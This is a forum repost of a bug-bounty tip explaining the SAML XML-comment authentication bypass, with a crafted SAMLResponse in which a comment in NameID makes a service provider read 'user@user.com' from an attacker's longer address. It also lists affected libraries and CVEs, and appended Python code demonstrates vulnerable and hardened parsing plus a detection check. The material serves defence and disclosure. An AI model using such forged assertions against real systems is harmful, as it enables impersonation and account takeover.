Nytro, Posted April 15, 2020

Bounty Tip: How to bypass authorization in SAML!
Shaurya Sharma, Apr 3

Security Assertion Markup Language (SAML) is an open XML-based standard for exchanging authentication and authorization data between parties. The vulnerabilities described here affect several SSO providers and several libraries that implement SAML SSO (Single Sign-On).

SAML

With the SAML protocol, users can access many of their cloud applications with a single username and password. Single Sign-On (SSO) is a common technology that lets a user log in to a web application through a "third party", itself a web application. The error lies in this implementation: an attacker can place an XML comment inside the username field, and the only precondition is that the attacker holds a valid username.

The problem lies in how the XML markup handles comments. When a comment is placed inside the username field, the text value is split at the comment. When processing the user name, the affected implementation "cuts off" the value after the comment and does not take it into account during the check:

import xml.etree.ElementTree as et

def name_id_text():
    doc = "<NameID>test<!-- comment -->user</NameID>"
    data = et.fromstring(doc)
    return data.text  # returns 'testuser'

The expected value is "testuser", and Python's ElementTree, which discards comments, returns it. In an affected implementation the "break" at the comment means that only the value "test" is returned.

As an example of this attack, a user with access to the user@user.com.evil.com account can modify the SAML response so that the SP processes NameID as user@user.com:

<SAMLResponse>
  <Issuer>https://idp.com/</Issuer>
  <Assertion ID="_id1234">
    <Subject>
      <NameID>user@user.com<!---->.evil.com</NameID>
    </Subject>
  </Assertion>
  <Signature>
    <SignedInfo>
      <CanonicalizationMethod Algorithm="xml-c14n11"/>
      <Reference URI="#_id1234"/>
    </SignedInfo>
    <SignatureValue>
      some base64 data that represents the signature of the assertion
    </SignatureValue>
  </Signature>
</SAMLResponse>

The following implementations are affected by this attack:

OneLogin, python-saml: CVE-2017-11427
OneLogin, ruby-saml: CVE-2017-11428
Clever, saml2-js: CVE-2017-11429
OmniAuth-SAML: CVE-2017-11430
Shibboleth: CVE-2018-0489
Duo Network Gateway: CVE-2018-7340

It is worth noting that the attack does not work against accounts protected by two-factor authentication (which, according to Google statistics, is enabled by roughly 10% of users).

To prevent such attacks, update the libraries in use, disable public registration of user accounts in important networks, or abandon the canonicalization algorithm that does not skip comments.

#HappyHunting #BugBountyTips

Source: https://medium.com/bugbountywriteup/bounty-tip-how-to-bypass-authorization-in-saml-f7577a6541c4
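The following is an added example (not code from the write-up or from any of the affected libraries) that shows, on a constructed copy of the response above, how reading only the first text node of NameID yields the truncated identity, and how a service provider can instead join all text nodes and reject a NameID that has been split by a comment. It uses xml.dom.minidom, which keeps comment nodes in the tree.

```python
import xml.dom.minidom as minidom

# Constructed sample, modelled on the response in the write-up (not a real SAML message).
SAML_RESPONSE = """<SAMLResponse>
  <Issuer>https://idp.com/</Issuer>
  <Assertion ID="_id1234">
    <Subject>
      <NameID>user@user.com<!---->.evil.com</NameID>
    </Subject>
  </Assertion>
</SAMLResponse>"""

# The same response without the injected comment, for comparison.
CLEAN_RESPONSE = SAML_RESPONSE.replace("<!---->", "")


def _name_id_node(xml_text):
    """Parse the response and return the NameID element (comments are preserved)."""
    doc = minidom.parseString(xml_text)
    return doc.getElementsByTagName("NameID")[0]


def vulnerable_name_id(xml_text):
    """Reads only the first text node of NameID, so everything after an
    XML comment is silently dropped: the truncation the write-up describes."""
    node = _name_id_node(xml_text)
    return node.firstChild.nodeValue


def has_comment_split(xml_text):
    """Detection check: True when NameID contains a comment node at all."""
    node = _name_id_node(xml_text)
    return any(c.nodeType == c.COMMENT_NODE for c in node.childNodes)


def hardened_name_id(xml_text):
    """Concatenates every text node of NameID, so the SP sees the full
    identifier (user@user.com.evil.com) rather than the prefix before the comment."""
    node = _name_id_node(xml_text)
    return "".join(c.nodeValue for c in node.childNodes if c.nodeType == c.TEXT_NODE)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_name_id(SAML_RESPONSE))   # user@user.com
    print("hardened:  ", hardened_name_id(SAML_RESPONSE))     # user@user.com.evil.com
    print("comment in NameID:", has_comment_split(SAML_RESPONSE))
```

A service provider that rejects any NameID for which has_comment_split() is true, and otherwise uses hardened_name_id(), no longer maps the evil.com account onto user@user.com.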